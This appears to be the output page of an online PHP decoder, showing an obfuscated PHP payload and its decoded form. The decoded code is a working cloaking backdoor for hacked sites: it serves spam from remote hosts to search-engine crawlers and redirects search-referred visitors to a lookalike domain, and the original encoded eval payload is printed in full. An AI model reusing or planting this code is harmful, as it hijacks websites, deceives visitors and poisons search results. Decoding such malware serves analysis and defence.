Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode(str_rot13('yIIgp9b4RC7Be1N9GTFzjLL06IjPcRA7GfxZbnzOmeH..
Decoded Output download
set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
define('URI', $_SERVER['REQUEST_URI']);
define('HOST', base64_decode('aHR0cHM6Ly9qaS5iZXQ2a3Nlby5jb20v'));
define('MULU', '[a-zA-Z0-9_-]+-[1-9]');
function isEngines($userAgent) {
return preg_match('/Googlebot|Bingbot|Yahoo!/i', $userAgent);
}
function isIncludes($uri) {
return preg_match('/' . MULU . '/i', $uri);
}
function isRef($referrer) {
return preg_match('/google|bing|yahoo/i', $referrer);
}
function getContents($url) {
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$result = curl_exec($ch);
$curlError = curl_error($ch);
curl_close($ch);
if ($result === false) {
error_log("cURL Error: " . $curlError);
return false;
}
return $result;
} else {
return file_get_contents($url);
}
}
$ref = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$key = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$ym = $_SERVER['HTTP_HOST'];
if (isEngines($key)) {
header('Content-Type:text/html;charset=utf-8');
if (isIncludes(URI)) {
$content = getContents(HOST . "?xhost=" . $ym . '&reurl=' . URI . '&ua=Googlebot' . '&f=google');
if ($content) {
echo $content;
} else {
header("HTTP/1.0 404 Not Found");
echo "404 - Content not found.";
exit;
}
} else {
echo file_get_contents('https://jsc.hhvipcdn.com/zz.php');
exit;
}
} else {
if (isIncludes(URI) && isRef($ref)) {
echo '<html>
<head>
<title>The resource cannot be found.</title>
<script>
window.location = "https://br.googleeplay.com/br30.html";
</script>
</head>
<body>
<h1>Not Found</h1>
</body>
</html>';
exit;
}
}
Did this file decode correctly?
Original Code
<?php
eval(gzinflate(base64_decode(str_rot13('yIIgp9b4RC7Be1N9GTFzjLL06IjPcRA7GfxZbnzOmeHMkzBRjBbMllrYNeaxi99XTTAZ6BG0uHU77YBesKzpHByWAdqrlBMZzeIXb0FS4ZVGABMPfzvz7jYdG6tjwH88xwFF1pR6cyqV0cJ0NmxCTlGjEHWynlTa1G8ZpPuA6WES1ZEQ9knsbeYKq9kiwihNKrse0BxCCUH/NhNJ1/aFUjOj7Ps0/ox3bLEC4AoihQKFhKisKI/+4/pi2V+/ic7573eurU3kp3kJ+4He+Iu3j+4DBCPQK31fI3/HdcqrqsF2+yPiKb6jNx4KRMTZE4tyGwDQa8DfYkVd2wA4INK9J0WjOWHYRnSL0Wx39lHWGTk/5ajJ0wTKGk+uWBe3hk9j/fMz6aR7vxocrF/XoHGPkHFURHjSBObOVjhc/BRUc6mtHrEm6qDfPmdSUyUkh4EaBhTaZJG7gSncowtm133vTMIcM3Jz4MnMGMT5OKy0kEXjLjVNw0IZDiSGaQcyRdNJlbjzuAvn9PJZO4+yPoOG9Tabqe/pjkQNIYD/B73OXGYh+PZYD9++fTeVWUjr+5XAD9cNJr3gZ6irDT8QXrZe214hy9ozyEntooOonuDekdfPh11q4sN14V7G/gAkG1UgAJQKTDmq3fOg9/b3lda+Tdq+i+iOqgmrsY93yACHQkC6/kmI/uj6DfBGEFv3wnReFuEOUdRZwye5QXG+SSQnDRXr0AFDJqFVMSSneGFQ3Slbf5THxZ9Zt0QzFZr7DtLZ+l5+YykhdwKsmiWpXgwG2OiRZ6XNmtKsxePDrwQxUgzo8gEWeLYnQPtNF6QXMdMJEzpjhVrJDvpq1kuI0Nq0mVnhRZnAHiyihw7Tb6oq0+C+VyKriTIom4SfW54nc5IlOP1Dcp8WTHGBSwYIn7la10sxTdq12AOyvtHPKqwiQEpxyWpYyD200svjPatvJ7dyxQJb2VztHBFJRwot0wpYi5IgZ9L309Mzu3Th+3dx0ztUx0DPadJFT4gv43AS0AJ16lNe57Im1BZF3sOSAQRX86nMQDJcbiE1XNYjIVRgbjOrZIxplbZpABCu6TRyLNxb2Z+RJRUjv8IxRzxAr3l04vQBy2VKO6L0m/9Pf9QWFr4Yfqp7aDyhdg5s772wdJd0s6JiWMZuiE4RSQLb4DgOXPW+cZbkczySziLTqBvpRZSvrJuDM8zvPI9nVFr+/iX0xYRgk1vxrx7w0S9iES28d2yIY5Esu7SsvgB0Q1/HUCCW+bH8t/c1At3tIl8l7of19rcp4lCAXMK+Nj=='))));
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | 8d2347f69b8c7168acea39a8ac883450 |
Eval Count | 1 |
Decode Time | 52 ms |